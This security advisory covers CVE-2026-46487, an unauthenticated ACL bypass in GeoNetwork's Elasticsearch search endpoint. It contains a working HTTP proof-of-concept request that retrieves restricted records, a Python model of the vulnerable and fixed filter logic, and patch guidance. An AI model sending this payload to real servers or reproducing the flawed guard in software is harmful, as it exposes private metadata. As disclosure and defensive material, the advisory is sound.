High · 7.5 · CVE-2026-46487 · Jul 1, 2026

CVE-2026-46487: GeoNetwork Elasticsearch Search ACL Bypass via Missing Query Field

Shubham Kandhare
Security Engagement Manager, SecureLayer7

An unauthenticated attacker can retrieve restricted metadata records from GeoNetwork by sending a search request that omits the query field, causing the access-control filter injection to be skipped e

Package: org.geonetwork-opensource:geonetwork
Ecosystem: maven
Affected: >= 4.0.0-alpha.1, <= 4.0.6-0

The problem

GeoNetwork 4.x proxies all Elasticsearch search requests through a filter layer that injects group-based visibility rules, draft exclusions, ownership checks, and portal filters before forwarding to the index.

A logic flaw in that injection step means it only fires when the incoming JSON body contains a top-level `query` key. A body that omits `query` (for example, one containing only `size`, `_source`, or `aggs`) bypasses the check entirely. The raw request reaches Elasticsearch with no ACL constraints, exposing all indexed metadata including records limited to specific groups, draft records, and records that should be portal-scoped.

Proof of concept

A working proof-of-concept for CVE-2026-46487 in org.geonetwork-opensource:geonetwork, with the exact payload below.

```http
POST /geonetwork/srv/api/search/records/_search HTTP/1.1
Host: <target>
Content-Type: application/json

{
  "size": 100,
  "_source": ["uuid", "resourceTitleObject", "groupOwner", "owner", "isPublishedToAll"],
  "sort": [{"_score": "desc"}]
}
```

The root cause is CWE-862 (Missing Authorization): the filter-injection code path is guarded by a condition that checks for the presence of a `query` node in the request body, so a body without that node skips the guard and forwards a completely unconstrained query to Elasticsearch.

The patch adds an unconditional ACL filter application step that runs regardless of whether a `query` field is present, ensuring the `bool` filter clauses (group visibility, draft status, ownership, portal scope) are always merged into the outgoing Elasticsearch request.
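To make the difference between the conditional guard and the unconditional merge concrete, here is an added Python model of the two code paths. It is not GeoNetwork's code: the function names, the ACL clause contents and the sample bodies are assumptions constructed for the illustration. The flawed variant only wraps a `query` that is already present; the fixed variant treats a missing `query` as `match_all` and always attaches the filter clauses.

```python
"""Model of CWE-862 as described in the advisory: an ACL filter that is
only injected when the body carries a top-level `query`, beside a version
that merges the ACL clauses unconditionally. Hypothetical helper names."""
import copy

# Constructed stand-in for the group-visibility / draft / portal clauses the
# real filter layer would derive from the caller's session (assumed values).
ACL_CLAUSES = [
    {"terms": {"groupOwner": ["1", "42"]}},    # groups the caller may read
    {"term": {"isPublishedToAll": "true"}},    # or records published to all
]

def inject_acl_vulnerable(body: dict, acl_clauses: list) -> dict:
    """Wraps the caller's query only when `query` exists. A body holding
    just `size` / `_source` / `aggs` is forwarded with no constraint."""
    body = copy.deepcopy(body)
    if "query" in body:                        # the flawed guard
        body["query"] = {"bool": {"must": [body["query"]],
                                  "filter": acl_clauses}}
    return body

def inject_acl_fixed(body: dict, acl_clauses: list) -> dict:
    """Always merges the ACL clauses; an absent `query` becomes match_all
    and is still constrained by the same filter."""
    body = copy.deepcopy(body)
    user_query = body.get("query", {"match_all": {}})
    body["query"] = {"bool": {"must": [user_query], "filter": acl_clauses}}
    return body

def is_acl_constrained(body: dict, acl_clauses: list) -> bool:
    """Checks what would reach the index: every ACL clause must be present
    in the top-level bool filter of the outgoing request."""
    filt = body.get("query", {}).get("bool", {}).get("filter", [])
    return all(clause in filt for clause in acl_clauses)

# Constructed request bodies: the advisory's trigger shape (no `query`)
# and an ordinary keyword search for comparison.
NO_QUERY_BODY = {"size": 100, "_source": ["uuid", "resourceTitleObject"]}
NORMAL_BODY = {"query": {"match": {"resourceTitleObject.default": "river"}}}

if __name__ == "__main__":
    for name, body in [("no query", NO_QUERY_BODY), ("normal", NORMAL_BODY)]:
        vuln = is_acl_constrained(inject_acl_vulnerable(body, ACL_CLAUSES), ACL_CLAUSES)
        fixed = is_acl_constrained(inject_acl_fixed(body, ACL_CLAUSES), ACL_CLAUSES)
        print(f"{name}: vulnerable constrained={vuln}, fixed constrained={fixed}")
```

The same `is_acl_constrained` check, applied to the request a proxy layer actually emits, is a cheap regression test to keep in place after upgrading.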

No public PoC has been published; this payload is derived directly from the advisory's stated trigger condition (omitting the `query` field) and the documented search endpoint behaviour.

The fix

Upgrade to GeoNetwork 4.4.11 or later (the first release containing the unconditional ACL filter guard). If an immediate upgrade is not possible, restrict unauthenticated access to `/srv/api/search/records/_search` and `/_msearch` at the reverse-proxy or WAF layer until the patch can be applied.

Reporter not attributed.

References: [1][2]
